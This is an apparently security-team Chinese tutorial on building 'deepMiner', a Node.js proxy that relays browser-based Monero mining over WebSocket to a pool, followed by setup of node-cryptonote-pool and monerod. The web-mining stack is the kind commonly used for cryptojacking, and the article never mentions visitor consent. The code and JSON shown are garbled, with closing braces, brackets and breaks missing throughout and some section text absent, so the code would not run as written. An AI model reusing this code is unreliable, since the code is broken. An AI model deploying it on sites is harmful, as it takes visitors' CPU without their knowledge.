
Posted 阿里云应急响应






  1. 从现有开源的矿池项目直接二次构造,搭建兼容WebSocket通信方式的完整Pool。



     2. 从头构造流量转换,用 Pool_Proxy 形式,对接转化WebSocket与PoolSocket,以中间件形式介入。



从优缺点看,我们首要选择从 Pool_Proxy 中间件方式来构造前端挖矿的服务端,而后端Pool的选择空间就更大了,可以选择现有的公开矿池,也可以另外结合再自己搭建矿池。





所以基础框架,先获得两边的接口,并使其能够正常对接,所以我们需要先写入如下内容到一个新建的 server.js 里:

var http = require('http'),    //web承载
    WebSocket = require("ws"), //WebSocket实现
    net = require('net'),      //PoolSocket(TCP)实现
    fs = require('fs');        //访问本地文件系统
    "lhost": "",
    "lport": 7777,
    "domain": "miner.deepwn.com",
    "pool": "pool.usxmrpool.com:3333",
    "addr": "41ynfGBUDbGJYYzz2jgS***************************************************",
    "pass": ""

再继续往 server.js 里加入代码,读取配置文件并构造出大体框架。


var conf = fs.readFileSync(__dirname + '/config.json', 'utf8');
conf = JSON.parse(conf);
// Http web
var web = http.createServer((req, res) => {
    res.setHeader('Access-Control-Allow-Origin', '*');
    res.end('Pool Worked!'); // Change at Next...
    }).listen(conf.lport, conf.lhost);

// next codes here...

打开浏览器,从自己的127.0.0.1:7777已经能访问看到Pool Worked!页面。


为了方便书写,我们先声明一个叫做 conn 的对象来接管所有设置内容,为了方便后期调用。

其中囊括了ws服务,以及每次ws新连接所触发的net.Socket(),同时声明每个连接的 pid 来解决一个关于Miner_banned的坑……


 client >>

     "method": "login",
     "params": {
         "login": "********** [ Wallet Addr ] **********",
         "pass": "",
         "agent": "xmr-stak-cpu/1.3.0-1.5.0"
     "id": 1 // <= 这个id 可以重复使用重复登录,但是过多为完成jobs,或者同时间id=1并发登录,将造成Miner被ban。

 server <<

     "id": 1, // <= 登录的MinerID,不用IP区分应该是担心存在DHCP下的Miner出口IP相同,能够理解……
     "jsonrpc": "2.0",
     "error": null,
     "result": {
         "id": "811233385116793",
         "job": {
             "blob": "0606e498c5ce057326423f235dcd67dec07d9cb79e3506da8b35198e7debb40be3cbc2326c1999000000008bad7c9d5b78e9c9693903e817d20c09befe2c72ee6d20f297c0026d9a6e492406",
             "job_id": "664084446453489",
             "target": "711b0d00"
         "status": "OK"



// Websocket 成功连接后,流程内部发出TCP_Socket连接Pool不单独控制TCP销毁
var srv = new WebSocket.Server({
    server: web, // 这里从web接管ws的操作
    path: "/proxy", //可以加上path区分
    maxPayload: 256
srv.on('connection', (ws) => { //当连接成功时,我们开始构造conn
    var conn = {
        uid: null, //为后期框架管理面板区分不同站点的UID
        pid: new Date().getTime(), //解决踩坑……区分MinerID
        workerId: null, //来自PoolJobs内job_id
        found: 0,
        accepted: 0,
        ws: ws, //this ws
        pl: new net.Socket(), //TCP Socket
    var pool = conf.pool.split(':');
    conn.pl.connect(pool[1], pool[0]); //使用新conn.pl对象,TCPSocket介入Pool

    // on.('event') & some func here...


在一切顺利的情况下我们开始下一步,处理不同事件,现在可以将 // on.('event') & some func here... 改为:

// Trans func here...

conn.ws.on('message', (data) => {
    ws2pool(data); // Trans WS2TCP
    console.log('[>] Request: ' + conn.uid + '\n\n' + data + '\n');
conn.ws.on('error', (data) => {
    console.log('[!] ' + conn.uid + ' WebSocket ' + data + '\n');
conn.ws.on('close', () => {
    console.log('[!] ' + conn.uid + ' offline.\n');
conn.pl.on('data', (data) => {
    pool2ws(data); // Trans TCP2WS
    console.log('[<] Response: ' + conn.uid + '\n\n' + data + '\n');
conn.pl.on('error', (data) => {
    console.log('[!] PoolSocket ' + data + '\n');
    if (conn.ws.readyState !== 3) {
conn.pl.on('close', () => {
    console.log('[!] PoolSocket Closed.\n');
    if (conn.ws.readyState !== 3) {
  1. conn.ws.on('event', [function]) 接管了在不同情况下对WebSocket的处理方式。

  2. conn.pl.on('event', [function]) 接管了对接Pool的不同处理方式。

那么我们还少了什么? 对,如何转换Socket流量才是核心内容,我们替换刚才 // Trans func here... 为如下,开始勾画核心——Socket转换的Functions:

// Trans WebSocket to PoolSocket
function ws2pool(data) {
    var buf;
    data = JSON.parse(data);
    switch (data.type) {
        case 'auth':
                conn.uid = data.params.site_key;
                if (data.params.user) {
                    conn.uid += '@' + data.params.user;
                buf = {
                    "method": "login",
                    "params": {
                        "login": conf.addr,
                        "pass": conf.pass,
                        "agent": "deepMiner"
                    "id": conn.pid
                buf = JSON.stringify(buf) + '\n';
        case 'submit':
                buf = {
                    "method": "submit",
                    "params": {
                        "id": conn.workerId,
                        "job_id": data.params.job_id,
                        "nonce": data.params.nonce,
                        "result": data.params.result
                    "id": conn.pid
                buf = JSON.stringify(buf) + '\n';

// Trans PoolSocket to WebSocket
function pool2ws(data) {
    var buf;
    data = JSON.parse(data);
    if (data.id === conn.pid && data.result) {
        if (data.result.id) {
            conn.workerId = data.result.id;
            buf = {
                "type": "authed",
                "params": {
                    "token": "",
                    "hashes": conn.accepted
            buf = JSON.stringify(buf);
            buf = {
                "type": 'job',
                "params": data.result.job
            buf = JSON.stringify(buf);
        } else if (data.result.status === 'OK') {
            buf = {
                "type": "hash_accepted",
                "params": {
                    "hashes": conn.accepted
            buf = JSON.stringify(buf);
    if (data.id === conn.pid && data.error) {
        if (data.error.code === -1) {
            buf = {
                "type": "banned",
                "params": {
                    "banned": conn.pid
        } else {
            buf = {
                "type": "error",
                "params": {
                    "error": data.error.message
        buf = JSON.stringify(buf);
    if (data.method === 'job') {
        buf = {
            "type": 'job',
            "params": data.params
        buf = JSON.stringify(buf);

查看第一篇文章提到的 coinhive.min.js 我们可以看到WebSocket主要有 auth / submit / ( banned ) 三个不同内容。

而从Socket_Dump中我们看到,PoolSocket里只有标准化的 JsonRPC ,所以我们需要转换出当前脚本能接受的 authed / job / hash_accepted / ( error ) 四种类型返回如上。

req.url = (req.url === '/') ? '/index.html' : req.url;
    fs.readFile(__dirname + '/web' + req.url, (err, buf) => {
        if (err) {
            fs.readFile(__dirname + '/web/404.html', (err, buf) => {
        } else {
            if (!req.url.match(/\.wasm$/) && !req.url.match(/\.mem$/)) {
                buf = buf.toString().replace(/%deepMiner_domain%/g, conf.domain);
            } else {
                res.setHeader('Content-Type', 'application/octet-stream');

将所需的web文件,放入web文件夹,其中lib文件夹放入 cryptonight-asmjs.min.js / cryptonight-asmjs.min.js.mem / cryptonight.wasm ,最终我们拥有了一个200行代码写出来的 Pool_Proxy 中间件!

deepMIner 项目实例

参考Repo: https://github.com/deepwn/deepMiner

Example: https://deepc.cc/demo.html

|-- README.md
|-- banner
|-- config.json
|-- package-lock.json
|-- package.json
|-- server.js
|__ web
    |-- 404.html
    |-- deepMiner.js
    |-- demo.html
    |-- index.html
    |-- lib
    |   |-- cryptonight-asmjs.min.js
    |   |-- cryptonight-asmjs.min.js.mem
    |   |__ cryptonight.wasm
    |__ worker.js


(以下内容,可以跳过或者选取阅读。你可以直接在 config.json 里使用对外开放的公共矿池,也可以继续跟着本文,搭建自己的矿池。因为这个200行的Pool_Proxy已经可以完美地独立运转了!)



Github: https://github.com/zone117x/node-cryptonote-pool

Monero: https://getmonero.org


首先,保证我们的服务器有 1C1G 的标准,因为本矿池并不对外,可以只在localhost运行,所以我们不需要太大的规格来容纳那么多连接。


dd if=/dev/zero of=/mnt/myswap.swap bs=1M count=4000
mkswap /mnt/myswap.swap
swapon /mnt/myswap.swap

再把设置出来的内存,挂载到系统里 vi /etc/fstab 并加入如下(保存退出: :wq

/mnt/myswap.swap none swap sw 0 0


apt-get install build-essential libtool autotools-dev autoconf pkg-config libssl-dev
apt-get install libboost-all-dev git libminiupnpc-dev redis-server
add-apt-repository ppa:bitcoin/bitcoin
apt-get update
apt-get install libdb4.8-dev libdb4.8++-dev

麻烦的事情总是要来的,我们需要得到完整版区块链信息来完成交易和任务发布,所以需要构建可信的 monerod 本地进程。


mkdir monero
cd monero
wget https://downloads.getmonero.org/cli/monero-linux-x64-v0.11.0.0.tar.bz2
tar -xjvf monero-linux-x64-v0.11.0.0.tar.bz2

然后运行 ./monerod 开始长达3-6小时的下载区块链信息和验证完整性……

当然,官网也介绍了一个更方便的方式,直接手动下载 raw 文件并导入验证。

// 下载并验证导入
wget -c --progress=bar https://downloads.getmonero.org/blockchain.raw
./monero-blockchain-import --verify 0 --input-file ./blockchain.raw

// 验证完之后就可以移除辣~
rm -rf ./blockchain.raw

// 继续开启demon并后台运行
./monerod --detach



之前已经下载了 nodejs 所以不做重复下载。我们还需要 Redis 解决Pool的数据库问题。





cd /srv
git clone https://github.com/zone117x/node-cryptonote-pool.git pool
cd pool
npm update


cp config_example.json config.json

vi config.json 开始配置Pool信息

/* Used for storage in redis so multiple coins can share the same redis instance. */
"coin": "monero",

/* Used for front-end display */
"symbol": "MRO",

"logging": {

    "files": {

        /* Specifies the level of log output verbosity. This level and anything
           more severe will be logged. Options are: info, warn, or error. */
        "level": "info",

        /* Directory where to write log files. */
        "directory": "logs",

        /* How often (in seconds) to append/flush data to the log files. */
        "flushInterval": 5

    "console": {
        "level": "info",
        /* Gives console output useful colors. If you direct that output to a log file
           then disable this feature to avoid nasty characters in the file. */
        "colors": true

/* Modular Pool Server */
"poolServer": {
    "enabled": true,

    /* Set to "auto" by default which will spawn one process/fork/worker for each CPU
       core in your system. Each of these workers will run a separate instance of your
       pool(s), and the kernel will load balance miners using these forks. Optionally,
       the 'forks' field can be a number for how many forks will be spawned. */
    "clusterForks": "auto",

    /* Address where block rewards go, and miner payments come from. */
    "poolAddress": "4AsBy39rpUMTmgTUARGq2bFQWhDhdQNek******************************************************************"

    // 上方一定要记得替换为自己的Wallet地址

    /* Poll RPC daemons for new blocks every this many milliseconds. */
    "blockRefreshInterval": 1000,

    /* How many seconds until we consider a miner disconnected. */
    "minerTimeout": 900,

    // 这里可以根据web挖矿,适当降低难度,也不需要这么多端口。
    "ports": [
            "port": 1111, //Port for mining apps to connect to
            "difficulty": 100, //Initial difficulty miners are set to
            "desc": "Low end hardware" //Description of port
            "port": 2222,
            "difficulty": 500,
            "desc": "Mid range hardware"
            "port": 3333,
            "difficulty": 1000,
            "desc": "High end hardware"

    /* Variable difficulty is a feature that will automatically adjust difficulty for
       individual miners based on their hashrate in order to lower networking and CPU
       overhead. */
    "varDiff": {
        "minDiff": 2, //Minimum difficulty
        "maxDiff": 1000,
        "targetTime": 100, //Try to get 1 share per this many seconds
        "retargetTime": 30, //Check to see if we should retarget every this many seconds
        "variancePercent": 30, //Allow time to very this % from target without retargeting
        "maxJump": 100 //Limit diff percent increase/decrease in a single retargetting

    /* Feature to trust share difficulties from miners which can
       significantly reduce CPU load. */
    "shareTrust": {
        "enabled": true,
        "min": 10, //Minimum percent probability for share hashing
        "stepDown": 3, //Increase trust probability % this much with each valid share
        "threshold": 10, //Amount of valid shares required before trusting begins
        "penalty": 30 //Upon breaking trust require this many valid share before trusting

    /* If under low-diff share attack we can ban their IP to reduce system/network load. */
    "banning": {


        "enabled": true,
        "time": 30, //How many seconds to ban worker for
        "invalidPercent": 25, //What percent of invalid shares triggers ban
        "checkThreshold": 30 //Perform check when this many shares have been submitted
    /* [Warning: several reports of this feature being broken. Proposed fix needs to be tested.] 
        Slush Mining is a reward calculation technique which disincentivizes pool hopping and rewards 
        'loyal' miners by valuing younger shares higher than older shares. Remember adjusting the weight!
        More about it here: https://mining.bitcoin.cz/help/#!/manual/rewards */
    "slushMining": {
        "enabled": false, //Enables slush mining. Recommended for pools catering to professional miners
        "weight": 300, //Defines how fast the score assigned to a share declines in time. The value should roughly be equivalent to the average round duration in seconds divided by 8. When deviating by too much numbers may get too high for JS.
        "lastBlockCheckRate": 1 //How often the pool checks the timestamp of the last block. Lower numbers increase load but raise precision of the share value

/* Module that sends payments to miners according to their submitted shares. */
"payments": {
    "enabled": true,
    "interval": 600, //how often to run in seconds
    "maxAddresses": 50, //split up payments if sending to more than this many addresses
    "mixin": 3, //number of transactions yours is indistinguishable from
    "transferFee": 5000000000, //fee to pay for each transaction
    "minPayment": 100000000000, //miner balance required before sending payment
    "denomination": 100000000000 //truncate to this precision and store remainder

/* Module that monitors the submitted block maturities and manages rounds. Confirmed
   blocks mark the end of a round where workers' balances are increased in proportion
   to their shares. */
"blockUnlocker": {
    "enabled": true,
    "interval": 30, //how often to check block statuses in seconds

    /* Block depth required for a block to unlocked/mature. Found in daemon source as
    "depth": 60,
    "poolFee": 1.8, //1.8% pool fee (2% total fee total including donations)
    "devDonation": 0.1, //0.1% donation to send to pool dev - only works with Monero
    "coreDevDonation": 0.1 //0.1% donation to send to core devs - only works with Monero

/* AJAX API used for front-end website. */
"api": {
    "enabled": true,
    "hashrateWindow": 600, //how many second worth of shares used to estimate hash rate
    "updateInterval": 3, //gather stats and broadcast every this many seconds
    "port": 8117,
    "blocks": 30, //amount of blocks to send at a time
    "payments": 30, //amount of payments to send at a time
    "password": "test" //password required for admin stats

/* Coin daemon connection details. */
"daemon": {
    "host": "",
    "port": 18081

/* Wallet daemon connection details. */
"wallet": {
    "host": "",
    "port": 8082

/* Redis connection into. */
"redis": {
    "host": "",
    "port": 6379,
    "auth": null //If set, client will run redis auth command on connect. Use for remote db

最后在终端键入 node init.js 让Pool开始工作, 也可以用比如 node init.js -module=api 只开启单独项目。

当然你也可以用 forever start /srv/pool/init.js 确保出错了还能在线,也可以将其写入开机启动项里。不过值得注意的是:切记要把Pool的开启,放在Pool_Proxy开启之前哦!

如此一来,Pool + Pool_Proxy 就完成了,请开始你的表演吧~

Pool 相关项目






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